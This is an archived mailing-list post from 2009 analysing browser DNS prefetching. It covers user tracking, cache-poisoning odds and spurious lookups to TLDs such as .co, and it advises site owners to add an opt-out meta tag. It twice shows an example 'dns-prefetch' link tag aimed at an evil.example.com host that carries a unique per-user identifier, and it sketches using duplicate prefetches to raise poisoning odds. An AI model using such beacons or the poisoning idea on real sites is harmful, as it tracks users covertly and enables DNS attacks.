[dns-operations] DNS pre-resolution
David Dagon
dagon at cc.gatech.edu
Sat Dec 5 22:21:43 UTC 2009
On Sat, Dec 05, 2009 at 06:49:30AM -0600, Jorge Amodio wrote:
> Andrew is assuming that chrome will lookup the dns name for every
> single URL on a page, I believe Roskind on the video said it was not
> as simple as that, also the response could be cached somewhere and
> the query never hit his servers.
If domains in each page are unique (e.g., specific to the session or
just hash of the IP), then caching is not an obstacle:
<link rel="dns-prefetch" href="http://${UNIQUE_IDENT}.evil.example.com/">
Many readers of this list have invented similar solutions, e.g., to
probe for open recursives. And there are patent applications for web
bugs, and many older implementations of such schemes. When building a
DNS tracking system, it is not hard to overcome caching.
> After seeing the video I was playing a little bit (I use chrome as
> my default browser) looking at the query log of my local bind
> caching server and I can see on the log how my desktop machine sends
> the queries for some names but not all, even if I hover over some
> URLs.
DNS prefetching is a side-channel (or a type of covert channel). The
resolution behavior is automated and controlled by the remote website.
Users (the people leaking information) have a few boolean controls to
turn prefetch off. It is on by default.
There are actually three types of prefetching, across the various
browser implementations:
a) "DOM-based speculative resolution" occurs when a browser or
similar rendering engine loads a webpage. I.e., it looks up
most of the links on a page.
Mozilla (FF 3.5+, and an earlier plugin for FF 3.0) uses an
opt-out approach for this feature. It is on by default, and
toggled by setting the preference "network.dns.disablePrefetch"
to true. The prefetching of domain elements founds in HTTPS
documents is turned off by default, however, and can be toggled
on (e.g., for a honeypot deployment, or turned on by malware) by
merely setting the preference network.dns.disablePrefetchFromHTTPS
to false.
HTML can also control this, and have their web page opted out of
prefetching. For this, a new meta element is recognized by
Firefox (and Chrome, etc.):
<meta http-equiv="x-dns-prefetch-control" content="off">
Instead of polluting a page with hrefs (which burden rendering
engines) spammers and trackers can just populate web pages with
invisible link tags:
<link rel="dns-prefetch" href="http://${UNIQUE_IDENT}.evil.example.com/">
At least in Firefox, the network.dns.disablePrefetchFromHTTPS
rule trumps all 'link rel' prefetch instructions.
There evidently was no public design/discussion of this feature,
at least that I can find. More details were announced at:
https://developer.mozilla.org/En/Controlling_DNS_prefetching
I assume we'll find out the hard way what the creative hackers
can do with this new side-channel. The blogs have suggested
webmail delivery tracking for non-https users.
I can think of one more use. Since FF 3.5 does not appear to
perform duplicate suppression in prefetches (generating multiple
prefetches for the same qname), it opens a birthday window for
poisoning. (E.g., a page with a thousand duplicate 'link rel'
prefetches is millions of times more likely to be poisoned. See
http://www.isoc.org/isoc/conferences/ndss/09/pdf/15.pdf for
discussion.)
I've only tested with with small N, but each duplicate doubles
the chances of an attacker's random guess. In pragmatic terms,
this threat is mitigated by the low-yield from poisoning a single
browser (1 attack == 1 victim, in most cases). Plus, remote
reach to the stub is often blocked by NAT, etc. I know that Dan
Kaminsky has stated that poisoning of the stubs is also a serious
concern, so perhaps he or others will expand upon this FF
feature.
Poisoning aside, there is a real opportunity to track users. If
you are a web developer, I would urge the addition of '<meta
http-equiv="x-dns-prefetch-control" content="off">' tags,
particularly when handling 3d-party content such as text sourced
from user input or advertising networks.
Normally, to track users with image bugs, one has to buy ads and
pay for the clicks. One can potentially use web-bugs as a
cost-free, click-free way to track user rendering of a page.
Perhaps prefetching is being made smarter (context of DOM-aware
fetching) in more recent browsers.
b) "State-based speculative resolution" occurs when an application
experiences a major state change. For example, Chrome resolves
your top N favorite domains on startup. N is thankfully small.
It seems Safari does this as well.
As a practical matter, I think N has to be small, as anyone who
has attempted to sync resolve large numbers of domain names can
tell you. Even if done async, 3 second timeouts are inevitable
in large, batch resolutions, taking up valuable queue space in
the local recursives. I speculate therefore that browser
engineers are unlikely to make N very large; it may sometimes
give the appearance of being slow.
c) "Partial input speculative resolution" occurs when the browser
interprets user input before completion. For example, if you are
typing in the location bar, the browser may attempt to resolve
substrings in input field, before one has finished typing the
full domain name. (This uses 'effective TLDs' as a heuristic, so
that not every possible substring is resolved.)
I believe this is a pernicious type of resolution, since
substrings are resolved, and 'losers' in the lexical lottery will
include the authorities for .co (the substring for .com) and .ne
(the substring for .net), among others. Chrome does this type of
resolution (v.3, v.4, and ChromeOS).
Ads that include a domain name are the most likely candidate for
typing (since the user lacks a bookmark), and most of these would
end in .com, I suspect. So right now, chrome users are sending
spurious lookups to .co and other authorities (likely .ne). With
only ~2% of the browser share, this might not matter. I am
concerned that when a million monkeys using IE have partial input
speculative resolution, and type in domains ending in .com, the
volume might be significant.
From a university backbone, here are the most popular authorities
for substrings that would result in non-useful prefetches:
.ne 37.1%
.co 22.6%
.cz 8.7%
.arpa 8.0%
.ga 7.3%
Note that these are TLDs for valid fqdn substrings for all qnames
over a 2 month period, not just those that where a user actually
typed something. So the results are not representative and
likely reflect local bias (e.g., .ga is a substring in
".gatch.edu", which is commonly typed in the local network.)
But some 95% of all qnames had some valid fqdn substring (mostly
because of .co/.com). It is not know what portion of that
traffic would come from user-typing, as opposed to bookmarks and
DOM-driven resolution. A study is underway.
Judged by more local standards, I personally find it obnoxious
that my browser sends a DNS query to China and Columbia, all when
I type in www.cnn.com. The typed domain is parsed by the
prefetch engine as (((wwwn.cn)n.co)m'\n'), or graphically:
+----------------------------+ Each box contains a valid
| +------------------+ | fqdn, and all are prefetched
| | +--------+ | |
| | | www.cn | n.co | m | '\n'
| | +--------+ | |
| +------------------+ |
+----------------------------+
But that's just my preference to not send unwanted traffic, were
possible. If I ever own a .co domain, I would also find it
obnoxious if other browsers sent queries to my authority based on
partial input. Some DNS operators might be indifferent to the
spurious lookups, or want such traffic.
So if the costs are unknown, or relative to the zone owner, let's
consider the benefits of prefetching. The stated improvement of
prefetching is, by Chrome's own numbers, some where between 4% to
10% improved speed, on the order of tens of milliseconds. I
honestly don't know what to make of such a statement, which seems
to defeat itself. Perhaps the western world's need for rapid
loading of "LOL cat videos" trumps any concerns about the
implicit cost transfer in this arrangement. (That is, assuming
unlucky authorities ever need more secondaries to handle the IE
population, if it performs Chrome-style resolution.)
I don't know if the .co authorities have seen a measurable
increase in traffic, with only ~2% of the browsers running
Chrome. It may be hard to measure against the natural growth of
Internet traffic in general. But exponential growth (a plateau
that cannot otherwise be explained in comparison to zone size
deltas) would be one thing to look for.
Perhaps someone associated with .co's authorities can share that
information. If traffic increase is measurable, one can estimate
the burden when most of the browsers switch. IE makes up, what,
60% of a billion desktops? Surely that's a lot of typing. This
is all speculation. But if DNS typo correction is a
multi-million dollar industry, then browser input is significant.
I think this is worth worrying about.
Lastly, even if the volume of traffic not large, there might be
many domainer business opportunities around buying substrings of
domains. (E.g., someone might buy 'www.cnn.co', and find some
clever way to monetize the unwanted lookups.) If so, then
perhaps registrars for collision TLDs will enjoy a windfall.
Perhaps my concerns are overstated. I only know from history (e.g.,
DNS pinning attacks) that whenever browsers add innovative DNS
features, a wave of attacks follow. I realize the browser authors are
fine, honest people who only want to improve user experiences. And
besides the covert channel aspect, DNS prefetching is very clever---if
only we can determine the appropriate context for its use.
The process browser developers use to test ideas (blog announcements,
not IETF), requires that the cost of bad design be carried by others.
This is true of DNS prefetching. I hope DNS is not the latest battle
field for the browser wars.
--
David Dagon /"\ "When cryptography
dagon at cc.gatech.edu \ / ASCII RIBBON CAMPAIGN is outlawed, bayl
Ph.D. Candidate X AGAINST HTML MAIL bhgynjf jvyy unir
Georgia Inst. of Tech. / \ cevinpl."
More information about the dns-operations
mailing list